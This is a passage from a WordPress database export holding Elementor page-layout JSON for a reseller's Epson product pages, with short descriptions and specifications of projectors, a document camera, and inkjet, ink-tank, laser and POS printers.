]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7954,3480,'_wp_page_template','template-fullwidth.php'),(7958,3480,'_elementor_version','2.5.14'),(7970,3482,'_elementor_template_type','post'),(7971,3482,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" 